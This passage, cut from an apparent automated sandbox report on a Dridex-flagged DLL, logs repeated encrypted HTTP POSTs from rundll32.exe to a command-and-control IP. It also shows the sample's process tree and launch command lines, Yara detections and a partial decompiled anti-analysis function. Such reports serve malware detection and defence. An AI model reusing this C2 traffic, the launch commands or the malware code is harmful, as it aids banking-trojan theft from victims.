36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:51 UTC	370	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.3	50114	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:51 UTC	370	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:51 UTC	370	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:51 UTC	375	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.3	50120	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:54 UTC	375	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:54 UTC	375	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:55 UTC	380	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.3	50122	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:55 UTC	380	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:55 UTC	380	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:55 UTC	385	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.3	50130	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:59 UTC	385	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:59 UTC	385	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:29:00 UTC	395	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:29:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.3	50129	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:59 UTC	390	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:59 UTC	390	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:29:00 UTC	395	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:29:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49779	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:31 UTC	39	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:31 UTC	39	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:32 UTC	44	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.3	50137	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:29:03 UTC	395	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:29:03 UTC	395	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:29:04 UTC	404	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:29:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.3	50138	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:29:03 UTC	400	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:29:03 UTC	400	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:29:04 UTC	405	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:29:04 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.3	50145	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:29:07 UTC	405	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:29:07 UTC	405	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:29:08 UTC	414	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:29:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.3	50146	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:29:07 UTC	410	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:29:07 UTC	410	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:29:08 UTC	415	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:29:08 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49781	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:32 UTC	44	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:32 UTC	44	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:33 UTC	49	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6916 Parent PID: 2016

General

Start time:	05:25:05
Start date:	28/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll'
Imagebase:	0x8e0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000003.418389424.0000000000BE0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7000 Parent PID: 6916

General

Start time:	05:25:05
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll',#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7056 Parent PID: 6916

General

Start time:	05:25:06
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Bluewing
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000003.380069490.00000000007C0000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7076 Parent PID: 7000

General

Start time:	05:25:06
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll',#1
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000008.00000002.811984821.000000006E781000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000008.00000003.382887788.0000000002A20000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2196 Parent PID: 6916

General

Start time:	05:25:10
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Earth
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000A.00000003.411070931.0000000003410000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6028 Parent PID: 6916

General

Start time:	05:25:18
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.18296.dll,Masterjust
Imagebase:	0xa00000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000B.00000003.416855290.0000000004C10000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6916 Parent PID: 2016 loaddll32.exeCOMMON

Executed Functions

Function 6E7851A7, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 235
sleepCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E7851A7(void* __edi, signed int __esi) {
				void* _t190;
				signed int _t192;
				signed int _t198;
				signed int _t200;
				void* _t203;
				signed int _t211;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t239;
				intOrPtr _t240;
				intOrPtr* _t244;
				void* _t259;
				void* _t269;
				intOrPtr _t272;
				signed int _t282;
				signed int _t286;
				void* _t301;
				intOrPtr* _t302;
				signed int _t305;
				unsigned int _t309;
				intOrPtr _t312;
				signed short* _t313;
				signed int _t316;
				signed int _t333;
				signed int _t334;
				signed int _t339;
				char* _t347;
				char _t349;
				signed int _t360;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;
				signed int _t368;
				signed int _t369;
				signed int _t372;
				signed int _t373;
				void* _t378;
				signed int _t379;
				intOrPtr* _t434;
				intOrPtr* _t442;
				signed int _t457;
				signed int _t459;
				signed int _t462;
				signed int _t494;
				signed int _t496;
				intOrPtr* _t502;
				signed int _t503;
				signed int _t523;
				signed int _t527;
				void* _t532;
				signed int _t533;
				void* _t540;
				void* _t541;
				void* _t542;
				void* _t543;
				intOrPtr* _t544;
				intOrPtr* _t545;
				void* _t548;
				intOrPtr _t551;
				intOrPtr _t552;
				intOrPtr* _t553;

				_t530 = __esi;
				_t526 = __edi;
				E6E7A5CB0(_t553 + 0xdc, 3, 0x28, 0x64);
				_t361 = 0;
				_t540 = _t553 + 0x1e4;
				while(1) {
					E6E7A5CB0(_t540, 3, 0x14, 0x50);
					OutputDebugStringA( *(_t553 + 0x1e4));
					Sleep(0xa);
					E6E7A0B10(_t540);
					_t361 = _t361 + 1;
					if(_t361 >= 0xbebbe7c) {
						break;
					}
					while(_t361 >= 0x137b) {
						_t361 = _t361 + 1;
						if(_t361 < 0xbebbe7c) {
							continue;
						} else {
							OutputDebugStringA( *(_t553 + 0xd4));
